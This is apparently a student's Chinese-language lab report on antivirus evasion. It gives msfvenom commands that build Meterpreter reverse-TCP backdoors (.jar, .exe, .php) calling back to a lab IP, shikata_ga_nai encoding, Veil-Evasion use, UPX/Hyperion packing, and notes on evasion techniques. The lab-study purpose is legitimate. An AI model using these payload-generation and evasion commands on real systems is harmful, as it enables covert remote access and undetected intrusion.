20164305 徐廣皓 Exp3 免殺原理與實踐

• 免殺原理及基礎問題回答
• 實驗內容
  • 任務一：正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧
    • 使用msf編碼器生成各類後門程序及檢測
    • 使用veil-evasion生成後門程序及檢測
    • 半手工注入Shellcode並執行
  • 任務二：經過組合應用各類技術實現惡意代碼免殺
  • 任務三：用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

1、正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧

1. msfvenom生成.jar文件

• 生成java後門程序使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 4305_backjar.jar

• 掃描結果以下

2. msfvenom生成.exe文件

• 與實驗二相同，生成一次編碼（端口號作實驗的時候打錯了o(╥﹏╥)o）

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.129 LPORT=6305 -f exe > met-encoded.exe

• 查殺結果：

• 十次編碼使用命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.80.129 LPORT=6305 -f exe > msf4305.exe

• 查殺結果

3. msfvenom生成php文件

• 生成PHP命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 20164305.php

• 查殺結果

4. 使用veil-evasion生成後門程序及檢測

安裝veil

1 sudo apt-get install veil
2 sudo apt-get upgrade veil

• 而後我遇到羣裏出現的問題，也嘗試了屢次更新可是也沒效果（以下圖）

• 這個問題實際上只須要請將Autolt3文件夾從Programe Files (x86)下移動到Programe Files文件夾下就能夠解決。

使用veil

• 打開veil，veil

• 用use evasion命令進入Evil-Evasion

• 進入配置界面，use c/meterpreter/rev_tcp.py

• 輸入generate生成文件，接着輸入你想要playload名稱

• 而後去查殺，結果。。。確定不行

5. 半手工注入Shellcode並執行

• 這部分我在實驗2中就已經作過，詳情請見連接。、

• 查殺結果

 

6.加殼自制後門

• 壓縮殼

 

• 加密殼

  1 /usr/share/windows-binaries/hyperion/
  2 wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe

任務二：經過組合應用各類技術實現惡意代碼免殺

因爲懶惰，作本次試驗拖了幾天，看到不少同窗都達到了實驗報告中免殺的要求，因而我就按部分同窗的製做思路，復現了一下，發現沒有成功，具體狀況以下

• 我看到了有同窗說利用手工shellcode、加密殼和壓縮殼實現了免殺，因而我用helloworld的代碼試驗了一下
• 先編寫一個helloworld，而後對其編譯生成的exe文件進行壓縮、加密、加密壓縮的操做

• 而後在主機運行360的狀況下，將這些exe文件都拷貝到主機上，發現

• 哦看起來只有壓縮殼沒啥問題，而後我又把壓縮殼放到了網站上查殺了一下

• 雖然還沒結束，但這報毒率比真正有毒的PHP文件都高。。。。。
• 那麼問題來了，是我用的殼不對嗎？而後我又看到有的同窗說先用py生成shellcode而後用加密殼就沒有被查殺，我有復現了一遍，結果跟前面實驗同樣。。。。。
• 那看來要不就是個人360太強了，要不就是個人殼有問題。。。。。
• 還有一個問題，我在運行不加殼的c代碼，360就自動給我殺了。。。。
• 因此但願有利用半手工shellcode和殼作出免殺程序的同窗能夠私聊我，教我一下是怎麼作出來的（瞻仰大佬）Thanks♪(･ω･)ﾉ

 

實驗總結與體會

 

• 實驗感想

  無論是經過什麼方法，只要用加密殼就必定被殺，只要用反彈鏈接就會生成meterpreter文件也會被殺，因此只是改變編碼順序並不能避免被殺，真心但願前面作出來的同窗教我一下如何被免殺。

• 殺軟是如何檢測出惡意代碼的？

  • 基於特徵碼
  • 實時監控
  • 基於行爲的惡意軟件檢測

• 免殺是作什麼？

  能夠實現殺毒軟件不發現、掃描不出病毒代碼。

• 免殺的基本方法有哪些

  • 改變特徵碼
    • 加殼
    • shellcode+encoder
    • veil-evasion
    • 半手工化
  • 改變行爲
    • 通信方式
      • 儘可能使用反彈式鏈接
      • 使用隧道技術
      • 加密通信數據
    • 操做系統
      • 基於內存操做
      • 減小對系統的修改
      • 加入混淆做用的正常功能代碼

• 開啓殺軟能絕對防止電腦中惡意代碼嗎

  那必定是防不住的，殺毒軟件是被動的防禦方式，只有惡意代碼的更新纔會促進殺軟的升級